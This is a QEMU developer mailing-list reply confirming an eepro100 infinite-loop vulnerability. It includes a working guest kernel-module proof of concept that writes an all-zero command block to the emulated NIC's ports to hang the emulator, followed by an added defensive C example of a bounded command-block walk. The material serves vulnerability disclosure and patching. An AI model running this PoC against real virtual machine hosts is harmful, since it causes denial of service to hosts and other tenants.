From: Qinghao Tang
To: P J P
Cc: Jason Wang, QEMU Developers
Date: Fri, 20 Nov 2015 14:29:04 +0800
Subject: Re: [Qemu-devel] [PATCH] eepro100: prevent an infinite loop over same command block

I think the patch can solve this vulnerability. I confirm that the loop exists, the PoC code can prove that.
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/slab.h>      /* kmalloc / kfree */
#include <linux/string.h>    /* memset */
#include <asm/io.h>          /* outl / outw, virt_to_phys */

MODULE_LICENSE("GPL");

/* All-zero buffer that the emulated NIC will treat as a command block.
 * Kept static so it can be freed on module exit. */
static void *pvirt;

static int hello_init(void)
{
  phys_addr_t pphy;

  pvirt = kmalloc(0x100, GFP_KERNEL);
  if (!pvirt)
    return -ENOMEM;
  memset(pvirt, 0, 0x100);                        // control the fields of the eepro100_tx_t struct
  pphy = virt_to_phys(pvirt);                     // get physical address
  printk(KERN_ALERT "%p\n", pvirt);
  printk(KERN_ALERT "%llx\n", (unsigned long long)pphy);
  /* Ports assume the eepro100 I/O base is 0xc000: 0xc002 is the SCB command
   * word, 0xc004 the SCB general pointer. */
  outl((u32)pphy, 0xc004);                        // write the address
  outw(0x0060, 0xc002);                           // CU base load
  outl(0, 0xc004);                                // write the offset
  outw(0x0010, 0xc002);                           // CU start: enter action_command function
  return 0;
}

static void hello_exit(void)
{
  kfree(pvirt);
  printk(KERN_ALERT "goodbye,kernel\n");
}

module_init(hello_init);
module_exit(hello_exit);
MODULE_AUTHOR("qinghao tang");
MODULE_DESCRIPTION("poc for eepro100 infinite loop vulnerability");

2015-11-20 14:10 GMT+08:00 P J P <ppandit@redhat.com>:
> Hello Qinghao,
>
> +-- On Fri, 20 Nov 2015, Qinghao Tang wrote --+
> | Currently what problem do you have? Perhaps I could provide more support.
>
> Could you please confirm if the proposed patch here fixes the issue.
> Secondly there is uncertainty if the CB loop like Jason mentioned earlier is
> possible.
>
> | And please give this vulnerability a cve id.
>
> Yes I will; As soon as the patch is ready for upstream.
>
> Thank you.
> --
> Prasad J Pandit / Red Hat Product Security Team
> 47AF CE69 3A90 54AA 9045 1053 DD13 3D32 FE5B 041F
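The defensive side of what the thread discusses, as an added example that is neither QEMU's code nor the PoC author's: a command-block (CB) walk that stops when a CB's link resolves to the CB itself, which is exactly what the all-zero block above produces, and that additionally caps the number of CBs handled per CU start so any longer cycle also terminates. Guest memory, the CB layout, the scenario setup and the cap of 64 are constructed assumptions for this example.

```c
/* Added example, not QEMU's code: a bounded walk over an emulated eepro100
 * command-block (CB) chain. It stops when a CB's link resolves to the CB
 * itself (the all-zero block the PoC sets up) and caps CBs per CU start so
 * longer cycles also end. Memory layout, sizes and the cap are constructed. */
#include <stdint.h>
#include <string.h>
#define GUEST_MEM 4096   /* constructed guest physical memory, bytes */
#define CB_SIZE   16     /* status+command word, link word, payload */
#define MAX_CBS   64     /* assumed cap on CBs processed per CU start */
#define CMD_EL    0x8000 /* end-of-list bit of the CB command word */

static uint8_t guest_mem[GUEST_MEM];
static uint32_t rd32(uint32_t a) { uint32_t v; memcpy(&v, &guest_mem[a], 4); return v; }
static void wr32(uint32_t a, uint32_t v) { memcpy(&guest_mem[a], &v, 4); }
void reset_guest_mem(void) { memset(guest_mem, 0, sizeof guest_mem); }

/* Write a CB at addr: status 0, command in the upper 16 bits, then link. */
void put_cb(uint32_t addr, uint16_t command, uint32_t link) {
    wr32(addr, (uint32_t)command << 16);
    wr32(addr + 4, link);
}

/* Process CBs from cu_base + offset. Returns how many were handled; *aborted
 * is set when the guard, rather than the EL bit, ended the walk. */
int run_cu(uint32_t cu_base, uint32_t offset, int *aborted) {
    uint32_t cb = cu_base + offset;
    int n = 0;
    *aborted = 0;
    for (;;) {
        if (n >= MAX_CBS || cb + CB_SIZE > GUEST_MEM) { *aborted = 1; return n; }
        uint16_t command = rd32(cb) >> 16;
        uint32_t link = rd32(cb + 4);
        n++;                                  /* command dispatched here */
        if (command & CMD_EL) return n;       /* list ended normally */
        uint32_t next = cu_base + link;
        if (next == cb) { *aborted = 1; return n; } /* self-referencing CB */
        cb = next;
    }
}

/* Scenarios: 0 = all-zero CB linking to itself (the PoC's setup),
 * 1 = three-CB list ending with EL, 2 = two-CB cycle stopped by the cap.
 * Returns the CB count, negated when the guard ended the walk. */
int demo(int scenario) {
    int aborted, n;
    reset_guest_mem();
    if (scenario == 1) { put_cb(0, 0, 16); put_cb(16, 0, 32); put_cb(32, CMD_EL, 0); }
    if (scenario == 2) { put_cb(64, 0, 80); put_cb(80, 0, 64); }
    n = run_cu(scenario == 0 ? 256 : 0, scenario == 2 ? 64 : 0, &aborted);
    return aborted ? -n : n;
}
```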